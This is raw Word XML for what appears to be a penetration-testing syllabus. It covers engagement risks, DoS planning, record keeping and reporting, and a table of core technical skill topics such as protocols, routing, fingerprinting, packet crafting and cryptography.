        <w:t>At a minimum, it may slow the organization's networks response time due to network scanning and vulnerability scanning. Furthermore, the possibility exists that systems may be damaged in the course of penetration testing and may be rendered inoperable, even though the organization benefits in knowing that the system could have been rendered inoperable by an intruder. Although this risk is mitigated by the use of experienced penetration testers, it can never be fully eliminated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A23CC5" w:rsidRDefault="00A23CC5" w:rsidP="003514F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003514F1" w:rsidRPr="003514F1" w:rsidRDefault="003514F1" w:rsidP="003514F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003514F1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dangerous thing</w:t>
      </w:r>
      <w:r w:rsidR="00A23CC5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s can happen as an account of pen testing such as increased </w:t>
      </w:r>
      <w:r w:rsidRPr="003514F1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS </w:t>
      </w:r>
      <w:r w:rsidR="00A23CC5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and security audit logs. S</w:t>
      </w:r>
      <w:r w:rsidRPr="003514F1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ystem </w:t>
      </w:r>
      <w:r w:rsidR="00A23CC5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>may also have</w:t>
      </w:r>
      <w:r w:rsidRPr="003514F1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> unknown consequences like being unstable after.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00CF44F7" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7"/>
    <w:p w:rsidR="00932D8E" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A4c - </w:t>
      </w:r>
      <w:r w:rsidR="00932D8E" w:rsidRPr="005F25BF">
        <w:t>Effective planni</w:t>
      </w:r>
      <w:r w:rsidR="008F2F3E">
        <w:t>ng for potential DoS conditions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="003C378D" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C378D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Backups &amp; customer care (inform customer should working backups, more frequent backups, increase/excessive logs for applications and protection devices/IDSs, possibly monitor/delete logs more frequently or increase disk space or disable auto shutdown (i.e. CrashOnAuditFail regkey) for full logs, request contact for IDS admin/analyst).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRPr="003C378D" w:rsidRDefault="00CF44F7" w:rsidP="003C378D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C378D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System state (is it live or a test system, will customers be using system and are they aware i.e. possible performance hits on live system, if live is there a preferred testing time period [i.e. quite period, not during backups], if test does it fully represent the final system.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRDefault="00CF44F7" w:rsidP="00335CD8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A5 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Record Keeping,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Interim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Reporting &amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Final Results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRDefault="00CD6B06" w:rsidP="00CF44F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A5a - </w:t>
      </w:r>
      <w:r w:rsidR="00CF44F7" w:rsidRPr="005F25BF">
        <w:t>Under</w:t>
      </w:r>
      <w:r w:rsidR="00CF44F7">
        <w:t>standing reporting requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Define within the scope of the assessment (daily report briefs, final report, management reports, etc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Who to address and in what detail to present the findings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Should certain data be included (e.g. method of exploitation, sensitive details, password, etc).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A5b - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Understanding the importance of accurate and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>structured recor</w:t>
      </w:r>
      <w:r>
        <w:t>d keeping during the engagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Accuracy of results is of upmost importance so the client can access the risk. No false negatives and false positive </w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if not possible to confirm </w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the result </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>still a potential risk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Accurate record</w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for auditing of events</w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> during the assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Details of who did what, on what targets, and when.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="00CF44F7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What was identified or observ</w:t>
      </w:r>
      <w:r w:rsidR="00335CD8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ed on a target</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and at what time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If problems do occur the logs and records will help to identify the problem or prove that it was not a result of the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs of all traffic to and from a system can be recorded if required. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00D1486B" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Output of all tools used should be accurately saved, labelled and time stamped. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A detailed record of the procedures undertaken and the results obtained will ensure that nothing is missed and prove that a defined test methodology was adhered to during the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Accurate record keeping can help show that you have not committed an offence under the computer misuse act.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRPr="00CF44F7" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7"/>
    <w:p w:rsidR="005F1546" w:rsidRDefault="005F1546" w:rsidP="00932D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F25BF" w:rsidRDefault="00EE3290" w:rsidP="00EE3290">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Core Technical Skills</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE3290" w:rsidRDefault="00EE3290"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EE3290" w:rsidRPr="005F25BF" w:rsidTr="00EE3290">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="572"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IP Protocols</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IP protocols: IPv4 and IPv6, TCP, UDP and ICMP.</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Awareness that other IP protocols exist.</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B2</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Architectures</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Varying networks types that could be encountered</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>during a penetration test:</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CAT 5 / Fibre</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10/100/1000baseT</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Token ring</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Wireless (802.11)</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Security implications of shared media, switched</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>media and VLANs.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B3</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Routing</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Network routing protocols RIP, OSPF, and</w:t>
            </w:r>
            <w:r w:rsidR="00991A5D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IGRP/EIGRP.</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B4</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Mapping &amp; Target Identification</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Analysis of output from tools used to map the route</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>between the engagement point and a number of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>targets.</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Network sweeping techniques to prioritise a target list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>and the potential for false negatives.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D3F8A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LF</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000D3F8A" w:rsidRDefault="000D3F8A" w:rsidP="000D3F8A">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B5</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Interpreting Tool Output</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Interpreting output from port scanners, network</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sniffers and other network enumeration tools.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B6</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Filtering Avoidance Techniques</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The importance of egress and ingress filtering,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>including the risks associated with outbound</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>connections.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B7</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Packet Crafting</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Packet crafting to meet a particular requirement:</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Modifying source ports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Spoofing IP addresses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Manipulating TTL’s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Fragmentation</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Generating ICMP packets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B8</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OS Fingerprinting</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Remote operating system fingerprinting; active and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE3290">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>passive techniques.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B9</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Application Fingerprinting and Evaluating Unknown Services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Determining server types and network application</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>versions from application banners.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EE3290" w:rsidRDefault="00E80AD8" w:rsidP="00800AF4">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Evaluation of responsive but</w:t>
            </w:r>
            <w:r w:rsidR="00800AF4" w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> unknown network</w:t>
            </w:r>
            <w:r w:rsidR="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00800AF4" w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>applications.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B10</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Network Access Control Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>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Reviewing firewall rule bases and network access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>control lists.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B11</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Cryptography</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Differences between encryption and encoding.</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Symmetric / asymmetric encryption</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Encryption algorithms: DES, 3DES, AES, RSA, RC4.</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Hashes: SHA1 and MD5</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lastRenderedPageBreak/>
              <w:t>Message Integrity codes: HMAC</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B12</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Application of Cryptography</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SSL, IPsec, SSH, PGP</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Common wireless (802.11) encryption protocols:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WEP, WPA, TKIP</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B13</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File System Permissions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File permission attributes within Unix and Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file systems and their security implications.</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Analysing registry ACLs.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800AF4" w:rsidTr="00EE3290">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B14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00800AF4" w:rsidRDefault="00800AF4" w:rsidP="00800AF4">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
